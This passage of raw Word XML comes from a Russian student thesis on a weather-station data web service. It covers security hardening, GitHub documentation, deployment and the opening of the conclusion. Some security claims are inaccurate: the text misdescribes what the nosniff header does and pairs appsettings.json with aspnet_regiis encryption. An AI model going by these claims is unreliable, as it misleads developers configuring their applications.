          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC68C3">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3376">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Content-Type-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3376">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Options</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3376">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3376">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>nosniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3376">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">При получении этого заголовка браузер будет проверять, соответствует ли формат содержимого файла тому, который указан, это и называется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MIME</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sniffing</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595A92FA" w14:textId="17F6F19B" w:rsidR="00434B16" w:rsidRDefault="00434B16" w:rsidP="00434B16">
      <w:r>
        <w:t>Но вышеописанных действий ещё недостаточно для противодействия кибератакам, следует уделить внимание конфигурации веб-сервера, ведь при его конфигурации можно допустить множество грубых ошибок, которые позволят злоумышленникам осуществить свои незаконные действия.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779F76E3" w14:textId="297182F0" w:rsidR="00434B16" w:rsidRDefault="00434B16" w:rsidP="00434B16">
      <w:r>
        <w:t xml:space="preserve">Строка подключения к базе данных должна храниться в файле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF3376">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>appsettings.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00434B16">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">но строку нужно хранить не в открытом виде, а в зашифрованном. Это можно сделать с помощью утилиты </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3376">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>aspnet_regiis.exe:</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">запустить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Developer</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Prompt</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в режиме администратора и выполнить команду:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B90D34" w14:textId="3C85C8DF" w:rsidR="00434B16" w:rsidRDefault="00434B16" w:rsidP="00EF3376">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00434B16">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aspnet_regiis</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00434B16">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00434B16">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00434B16">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connectionStrings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00434B16">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  C</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\inetpub\wwwroot\YourAppName</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7377DD6A" w14:textId="00FCE2D2" w:rsidR="00434B16" w:rsidRDefault="00C368DE" w:rsidP="00434B16">
      <w:r>
        <w:t xml:space="preserve">При размещении веб сайта на хостинге необходимо обеспечить сокрытие информации об ошибках сервера. Злоумышленник может искусственным образом создать ошибку на сайте, после чего на экране может быть отображена полная информация об этой ошибке с сервера. Из </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>информации об ошибке хакер сможет вынести для себя много полезной информации такой как: строка подключения к базе данных, информация об архитектуре приложения. Иногда даже мелочь может сократить время поиска уязвимостей сайта. Отключить вывод ошибок можно добавлением строки кода в файл конфигурации:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00965368" w14:textId="36A62C2A" w:rsidR="00C368DE" w:rsidRDefault="00C368DE" w:rsidP="00434B16">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>customErrors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="atn"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="atv"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>"On"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049E5B5E" w14:textId="1D005B01" w:rsidR="00C368DE" w:rsidRDefault="00C368DE" w:rsidP="00434B16">
      <w:r>
        <w:t>Также в конфигурационном файле можно ограничить количество попыток ввода пароля, чтобы исключить тривиальную атаку перебором паролей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2599AB5B" w14:textId="5158FE52" w:rsidR="00C368DE" w:rsidRDefault="00C368DE" w:rsidP="00C368DE">
      <w:r>
        <w:t xml:space="preserve">Стоит еще заметить, что приложение может работать по протоколу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C368DE">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">пользователь будет подключаться к сайту по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="00C368DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для шифрования трафика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2180DB" w14:textId="2ED5FE7C" w:rsidR="00C368DE" w:rsidRPr="00C368DE" w:rsidRDefault="00C368DE" w:rsidP="00C368DE">
      <w:r>
        <w:t xml:space="preserve">Таким образом, имея ввиду вышеописанные аспекты безопасности веб-приложений </w:t>
      </w:r>
      <w:r w:rsidR="00CB576D">
        <w:t>в проекте реализован</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> безопасный, защищённый от хакерских атак интернет-портал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDDBD93" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00282062" w:rsidRDefault="0093378B" w:rsidP="00282062">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc162709244"/>
      <w:r w:rsidRPr="00282062">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Разработка документации</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="2BBE8C57" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004D79A4">
      <w:r>
        <w:t>Для того чтобы поддерживать веб-сервис в рабочем состоянии, его необходимо снабдить документационной базой. При масштабировании, исправлении ошибок или изменении функционала необходимо опираться на структурированную информацию о проекте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481ABA93" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004D79A4">
      <w:r>
        <w:t xml:space="preserve">Для обеспечения прозрачности истории изменений проект был выложен на сайт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GitHub</w:t>
      </w:r>
      <w:r w:rsidRPr="00F93289">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и доступен по адресу - </w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:history="1">
        <w:r w:rsidRPr="00EF3376">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://github.com/kradunches/ari-metiostation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Репозиторий проекта является открытым, поэтому новый разработчик сможет добавлять свои изменения. Сервис </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GitHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> хранит всю историю изменений репозитория, а также предоставляет возможность откатываться к предыдущим версиям проекта, если что-то пошло не так.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8CBAB1" w14:textId="12A8BA30" w:rsidR="003F0EAF" w:rsidRDefault="0093378B" w:rsidP="004D79A4">
      <w:r>
        <w:t xml:space="preserve">Также в качестве документации можно использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidRPr="00737ACE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>диаграмму классов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A8F034" w14:textId="50B03B2A" w:rsidR="003F0EAF" w:rsidRDefault="003F0EAF" w:rsidP="003F0EAF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CC08525" wp14:editId="39A6D7C4">
            <wp:extent cx="4824196" cy="8495414"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="8193" name="Рисунок 8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827294" cy="8500869"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DAA69B" w14:textId="22ECD5C4" w:rsidR="003F0EAF" w:rsidRPr="003F0EAF" w:rsidRDefault="003F0EAF" w:rsidP="003F0EAF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Рисунток</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>33</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Uml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F0EAF">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>диаграмма классов проекта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF75014" w14:textId="1AE30E51" w:rsidR="0093378B" w:rsidRPr="00737ACE" w:rsidRDefault="0093378B" w:rsidP="004D79A4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Данный тип диаграммы является очень полезным для разработчиков, на ней отражены все сущности и связи между ними.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E0DBD" w14:textId="77777777" w:rsidR="008F392E" w:rsidRDefault="008F392E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc161568218"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC7FBB0" w14:textId="241FF8F1" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="002A0DC9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc162709245"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6 Опытная и промышленная эксплуатация</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="0C0F627C" w14:textId="31D2E961" w:rsidR="0093378B" w:rsidRPr="007916D0" w:rsidRDefault="0093378B" w:rsidP="007916D0">
      <w:r>
        <w:t>Веб сервис для обработки полевых измерений был внедрен в лаборатории «</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73BD1">
        <w:t>Сектор средств инструментального контроля</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">» Федерального Государственного Бюджетного Учреждения «Агрофизический Научно-Исследовательский институт». Акт о внедрении представлен в </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">Приложении </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>Е</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4541F6D4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc122277553"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA6FD4F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc161568219"/>
      <w:bookmarkStart w:id="50" w:name="_Toc162709246"/>
      <w:r w:rsidRPr="00541C36">
        <w:lastRenderedPageBreak/>
        <w:t>ЗАКЛЮЧЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="37506E75" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve">В ходе выполнения выпускной квалификационной работы было проведено исследование существующих приложений </w:t>
      </w:r>
      <w:r>
        <w:t>статистических пакетов и агрономических веб-сервисов</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t>, определены их достоинства и недостатки. Исследован</w:t>
      </w:r>
      <w:r>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve"> алгоритм</w:t>
      </w:r>
      <w:r>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>дисперсионного анализа, обработки данных</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>их</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve"> математические основы. Был изучен и формализован алгоритм </w:t>
      </w:r>
      <w:r>
        <w:t>ранжирования данных и проведения статистического исследования</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve">. Выбраны методы и технологии создания </w:t>
      </w:r>
      <w:r>
        <w:t>веб-сервиса для хранения, обработки и визуализации данных</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve">. Разработано </w:t>
      </w:r>
      <w:r w:rsidRPr="004363A1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>веб-приложени</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="004363A1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> для обработки и визуализации данных, полученных с автоматической цифровой метеостанции</w:t>
      </w:r>
      <w:r w:rsidRPr="004363A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и почвенных датчиков-влагомеров </w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve">на языке </w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve">. Проведена оценка </w:t>
      </w:r>
      <w:r>
        <w:t>эффективности работы приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AA3F2B" w14:textId="7F18E653" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:r>
        <w:t xml:space="preserve">По итогам исследования существующих конкурентных системы было определено, что существующие системы не позволяют использовать их исходный код в виде плагинов в собственных разработках и отображать и анализировать данные с автоматической цифровой метеостанции и датчиков-влагомеров. С учётом этих недостатков были </w:t>
      </w:r>
      <w:r w:rsidR="00CB576D">
        <w:t>предъявлены</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> требования к разрабатываемой системе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55462518" w14:textId="6901F4E9" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:r>
